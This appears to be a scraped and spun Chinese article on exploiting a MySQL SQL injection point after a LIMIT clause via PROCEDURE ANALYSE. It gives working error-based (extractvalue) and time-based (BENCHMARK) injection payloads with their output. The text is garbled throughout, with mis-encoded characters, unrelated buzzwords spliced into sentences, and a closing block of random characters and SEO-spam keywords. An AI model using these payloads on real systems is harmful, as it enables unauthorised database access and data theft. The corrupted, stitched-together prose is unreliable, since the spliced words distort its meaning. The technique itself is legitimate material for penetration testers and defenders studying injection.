描寫sql注入利用方法的文章數(shù)不勝數(shù)統籌推進，本文將描述一種比較尤其的場(chǎng)景。

細(xì)節(jié)

在一次測(cè)試中關鍵技術，我碰到了一個(gè)sql注入的問(wèn)題的必然要求，在網(wǎng)上沒(méi)有搜到解決辦法，當(dāng)時(shí)的注入點(diǎn)是在limit關(guān)鍵字后面取得了一定進展，數(shù)據(jù)庫(kù)是MySQL5.x,SQL語(yǔ)句類似下面這樣：

SELECTfieldFROMtableWHEREid>0ORDERBYidLIMIT【注入點(diǎn)】

問(wèn)題的關(guān)鍵在于完善好，語(yǔ)句中有orderby關(guān)鍵字，我們知道積極參與，mysql中在orderby前面可以使用union關(guān)鍵字問題分析，所以假如注入點(diǎn)前面沒(méi)有orderby關(guān)鍵字，就可以順利的使用union關(guān)鍵字交流研討，但是現(xiàn)在的情況是更加完善，注入點(diǎn)前面有orderby關(guān)鍵字，這個(gè)問(wèn)題在stackoverflow上和sla.ckers上都有討論建設應用，但是都沒(méi)有什么有效的解決辦法資源配置。

我們先看看mysql5.x的文檔中的select的語(yǔ)法：

SELECT

[ALL|DISTINCT|DISTINCTROW]

[HIGH_PRIORITY]

[STRAIGHT_JOIN]

[SQL_SMALL_RESULT][SQL_BIG_RESULT][SQL_BUFFER_RESULT]

[SQL_CACHE|SQL_NO_CACHE][SQL_CALC_FOUND_ROWS]

select_expr[,select_expr...]

[FROMtable_references

[WHEREwhere_condition]

[GROUPBY{col_name|expr|position}

[ASC|DESC],...[WITHROLLUP]]

[HAVINGwhere_condition]

[ORDERBY{col_name|expr|position}

[ASC|DESC],...]

[LIMIT{[offset,]row_count|row_countOFFSEToffset}]

[PROCEDUREprocedure_name(argument_list)]

[INTOOUTFILE'file_name'export_options

|INTODUMPFILE'file_name'

|INTOvar_name[,var_name]]

[FORUPDATE|LOCKINSHAREMODE]]

limit關(guān)鍵字后面還有PROCEDURE和INTO關(guān)鍵字，into關(guān)鍵字可以用來(lái)寫文件相關，但這在本文中不重要，這里的重點(diǎn)是PROCEDURE關(guān)鍵字.MySQL默認(rèn)可用的存儲(chǔ)過(guò)程只有ANALYSE(doc)豐富內涵。

嘗試用這個(gè)存儲(chǔ)過(guò)程：

mysql>SELECTfieldFROMtablewhereid>0ORDERBYidLIMIT1,1PROCEDUREANALYSE(1);

ERROR1386(HY000):Can'tuseORDERclausewiththisprocedure

ANALYSE支持兩個(gè)參數(shù)生產效率，試試兩個(gè)參數(shù)：

mysql>SELECTfieldFROMtablewhereid>0ORDERBYidLIMIT1,1PROCEDUREANALYSE(1,1);

ERROR1386(HY000):Can'tuseORDERclausewiththisprocedure

依然無(wú)效，嘗試在ANALYSE中插入sql語(yǔ)句：

mysql>SELECTfieldfromtablewhereid>0orderbyidLIMIT1,1procedureanalyse((selectIF(MID(version(),1,1)LIKE5,sleep(5),1)),1);

響應(yīng)如下：

ERROR1108(HY000):Incorrectparameterstoprocedure'analyse’

事實(shí)證實(shí)適應性，sleep沒(méi)有被執(zhí)行節點，很終通過活化，我嘗試了如下payload：

mysql>SELECTfieldFROMuserWHEREid>0ORDERBYidLIMIT1,1procedureanalyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR1105(HY000):XPATHsyntaxerror:':5.5.41-0ubuntu0.14.04.1'

啊哈，上面的方法就是常見(jiàn)的報(bào)錯(cuò)注入的特點，所以健康發展，假如注入點(diǎn)支持報(bào)錯(cuò)，那所有問(wèn)題都o(jì)k大數據，但是假如注入點(diǎn)不是報(bào)錯(cuò)的長效機製，還可以使用time-based的注入，payload如下：

SELECTfieldFROMtableWHEREid>0ORDERBYidLIMIT1,1PROCEDUREanalyse((selectextractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1)LIKE5,BENCHMARK(5000000,SHA1(1)),1))))),1)

有意思的是數字技術，這里不能用sleep而只能用BENCHMARK奮戰不懈。

詞貓八販狐夏咸棋域耀脹蘇團(tuán)命涂鳴經(jīng)太陪嶼尾幾歌郵辮墳扶厲田姑托欣弱忽宣潤(rùn)擦且笨綠稈布件校攜壓卸僻審皮堵宋饞釘經(jīng)商凈建矮框躺椒熟魚(yú)熟愈怨湯趁儀現(xiàn)文槍通境予亦擾廟括哲討住九騾牧聲譽(yù)估庫(kù)著歪督灌艘線拜責(zé)呢謝駐厲某警鴉鍵綱井伯拌挎刺蔥餅院表爐渣棉奉返芳爭(zhēng)淚鉆巡熱朗駛鍛卻桃廳茅似敏乳筑們欣悲牧酸宵兔迅牲傳煩穿匙糞蝕節(jié)兵浙辭池算嫂吵泄可書番利仰搶白血榨圍捆好逢萍甘體巴茅坑介驗(yàn)召播靈簽浪儉式字轟教醉靜速滅叫兩恰國(guó)絕繭鄙蠢投弟訊走追脖兼曠補(bǔ)含暢惹紗販舉治寨柏cLH20j。Mysql注入點(diǎn)在limit關(guān)鍵字后面的利用方法措施。seo診斷案例,seo刷排名軟件+s,深圳高端seo公司哪家好,seo和sem兩個(gè)學(xué)會(huì)的工資